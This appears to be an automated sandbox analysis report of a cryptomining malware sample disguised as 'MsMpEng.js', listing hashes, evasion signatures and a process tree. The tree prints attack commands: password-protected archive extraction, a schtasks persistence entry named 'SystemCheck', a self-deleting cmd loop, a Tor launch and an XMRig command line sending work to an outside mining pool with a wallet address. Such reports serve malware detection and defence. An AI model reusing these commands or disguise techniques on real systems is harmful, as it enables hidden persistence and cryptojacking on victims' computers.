Resubmissions
09-04-2024 13:34
240409-qvlrtabe9s 1009-04-2024 13:34
240409-qvk6aabe81 1009-04-2024 13:33
240409-qthzjabe5z 1009-04-2024 13:33
240409-qthc1abe5y 1007-07-2023 11:45
230707-nw632ahf6w 10Analysis
-
max time kernel
298s -
max time network
302s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
14-04-2024 10:31
General
-
Target
MsMpEng.js
-
Size
24.2MB
-
MD5
690d57b0d8670391bad0876cae078bab
-
SHA1
32bea01d606128c606b71e19920099c6cb15030f
-
SHA256
b27dd5407a22c8df93090fbc1a3eb93c6461f4a279cfabd87b4b21e246bda458
-
SHA512
dd113765cd5cfeb99a98775c3c8e265463fca7863ffa519dcb7175312bbbeb4ea24ca45b4cef0320b430d413c020970346f4db671e0730e9e044cd2585f71fd4
-
SSDEEP
49152:34aSO/UYGzBMZ09d1X5EdS76+B0RX8DQQs8ReDlpgU3HApVeOGMmb5cUNWcGTRPk:H
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 11 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 6 IoCs
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 64 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of FindShellTrayWindow 20 IoCs
-
Suspicious use of SendNotifyMessage 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\MsMpEng.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\x.exe"C:\Users\Admin\AppData\Local\Temp\x.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\x.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\x.exe" exit)3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck283142⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\attrib.exe-a RandomX -o stratum+tcp://xmr.2miners.com:2222 -u 8BayjhYeujm9whuyNMsrd46tWdEd4JfAPfq6nXn1S4zrLzB9dduLbPuFPb3M2ZRFtfa6Zugfv5643AuBbmP8PDHaS3hQDdi.fhaw -p x -t 63⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck283142⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.4MB
MD57f9e6ee81558b38fbe276f60949d38b9
SHA16358b944b0515b04da8fe7fda7dc3dbbfb82423c
SHA2566cd0a0976cff64c5287c166b73e5c877f026274f85599344756c47e9aa756bcb
SHA512960966cc6254f15d5653ec9dbfe0fdc6725f2c1209b4ddb8b1c68d8f646521340f91029a53a5c8c60c9f813f3fe3e83644b052913178ac75886ccbd894be9ce3
-
Filesize
8.4MB
MD5a2a5a9b937771a4b82694c844fd27e36
SHA1402e2f7bfe1f24d6ea048d58bf156676132f515d
SHA256390126ab71cd12f414f4200cc246d5283c534ab216794ce9980048779960ea68
SHA512d352b147c8f045f9931725d25166916ce081ac5cf251f2987fb011deed2e8d3e08f91dbce8a2464abab5561b7915d69cbb7a0d02437b30b6fd3d5622621149e1
-
Filesize
722KB
MD543141e85e7c36e31b52b22ab94d5e574
SHA1cfd7079a9b268d84b856dc668edbb9ab9ef35312
SHA256ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d
SHA5129119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc
-
Filesize
14.6MB
MD5cfe4b8f7535c958ea26cde6f32b559aa
SHA1253ba3372c6c0b1c301f6e968c4fb7d5ffd696d0
SHA2560afc8b7c47f48ef991535d435d48411ea12c4b98f14253a27b15ec6d7f020620
SHA51201e8862cb7c1a3b247d09ca8e9f94c40232aaed93ab9f1937de0f69f83ba3d32926b6289b7bc5b8ae2bb06876b915a50ed65bb8ba10ffadcbbee579ce968bd39
-
Filesize
2KB
MD59160347bec74471e1a79edfd950629ae
SHA1c149a7e5aab6e349a70b7b458d0eaaa9d301c790
SHA2560fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab
SHA512b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358
-
Filesize
14.6MB
MD52380aed7f261148fdb35af6688e408ee
SHA1fa359778d16c934ba96b96f3c6c17a10a9e266b0
SHA25612afa4813940c6985259f487d5e2892550596a60c6c77f806aefa2c254c74bb4
SHA512646bdbc4f01991460755c6a2c2dbbca0a0170c83d06050ba50ec1b5406d58f8035498c84462dd9e6ab1d695b8854e2f4734d64ec2f4ab1083371fd145963bb85
-
Filesize
18.1MB
MD5efcd72ad2d3430248a68e5f960ed5e2b
SHA158cc7d2732f401b99926211c0dab319dfc0bba1a
SHA25641686ad9f581037f44b72b37f8bee562512854fc6807c5a13ea1646cdeab61c8
SHA512d50dd3628e0ed5b6040545e1a1836ffcdde30c4748b220efb7df29aa139b22b814d2466d6808c8dc3af765b9ce8092582720f69187a6562eefd6fca4cb9670e5
-
Filesize
25KB
MD56ef2eeff827f46042ec8af564b8450e7
SHA1f762a3853a81613755b6bb521cc9ede35b91915a
SHA256d596226d2f0e1cd0aaf523fc982caf957b28ce9db8381520d2cfa5ebb11de9e6
SHA512e0abdc3238911098b2ca300b171a0f72632ea7625846382a6c7a06b4e38cc8375588e2a629f8c906c9236a3aef205f75598f145a3eaac4d6a3bb1fa43246d691
-
Filesize
2.6MB
MD521e3778b11e03ced442a1ac73d8949ee
SHA19e416a029a3c6e6738cba0d1f69253ca283b73ea
SHA25603b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76
SHA51220b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9
-
Filesize
15.8MB
MD57268eb05d51294219569569ea006da2a
SHA1ade2c0a248f6aae9ff00f42e04dd3d1de242b289
SHA256188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12
SHA5120056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46
-
Filesize
2.5MB
MD554183220aa6c777f8228474ff5b5df01
SHA1ed438f17bffb37d42afd61d8dcef0c50d554c65c
SHA2569a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963
SHA51270b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987
-
Filesize
20KB
MD5a2fe7d18a849999e360d8640e2f8512d
SHA1f661f33c0d6b5c4526144a1a78ef2b0c43aa69dd
SHA256bfe970613e97c3119960cea719cc82135125ee09d2c01acd146411355ea78195
SHA512383e868929baee613ef56fe427e13bba2bb015328a79b792e40957908a0ecbfb8f030d672ebf7f2195338ef73db2d866f0e9cd4dd1c22b65af45fb1ccb919d88
-
Filesize
2.7MB
MD5ffcd5cbca9867eee8d74446c60ea6736
SHA11a14d9829b9ec3b18adbdca0f87df2fd34938992
SHA2562089eed082364ed1e52980737b55c54c434f42fdf5048077b63e0dc5ee8e69c3
SHA512e11ed7aab2389008bb02ed33cffaeeab18799acc1ebdecc9a84edc190a55dda41aa5543cc5d7a784e966cb3ab93973fe81a1b94db89e3600fff9017db083b6fb
-
Filesize
5.7MB
MD5a17f8bc4daa546d1f5283bb3b1cc86a0
SHA1fdc5e7f33474d881069bdbf56feeeb76d38c6b45
SHA256e8c2667bf974df9dda47c6d85555aceaad355e4591189a72929185832565d743
SHA5128690c2ba02857c45abad5be27d8b87589423dfa1da38a6fe86db542af57054e1dbb5ab23d91791c9b827063b71626f9f81a2f66fe8badfcff49e3e6e6b7c2536
-
Filesize
20.4MB
MD5c94e7e781466519f7005c2ab30ec545a
SHA1acef6e94570c76bcc41d2958f4c7aae72aacd02a
SHA2561f6066c7e879e6b95dcece2903898d574b66224d63069141809aa628e93c1bec
SHA5125d92ebc517e11148b4e6874c528622ad87843f3bd863e4d687c459a781d56b947837a00c457d5936329ed2740395381e9465e9ad10df6ba6a3282018e9a48a1c
-
Filesize
4KB
MD5a72a04210891d965206481b08b2451b2
SHA105e72f70e67e29de4bdb757055f89017de5ca1bb
SHA256cd849ba705b61576bed19736a19ccfe2a4ed0e4b452775c2686b369f8cf6a3f3
SHA512c94359fd8920590036822098b391c985ab812e7fec213aacb938d520cb346be1dfe99688df9395634f399662a1a32be766df4295cefd441b3900c0ef28a46712
-
Filesize
6B
MD5770a27772ec708b6fb4243e32d4805b4
SHA15666482b3ad728f436a0d90606aded050f0da13d
SHA256c8d22acdb4e14be25b3aaf12e857130dd631ab0d0c5c109304f2046f122bc746
SHA51280e46283b906039edf27609a43be47747a7fd862569c9039c13b579b6915c25b2c2ac4f7390b17f2d76b1b4cd6880ceded38b097045e82ce639e5bffb456a01f
-
Filesize
201B
MD5b9d2fe9cfa840518fa39039c928d4938
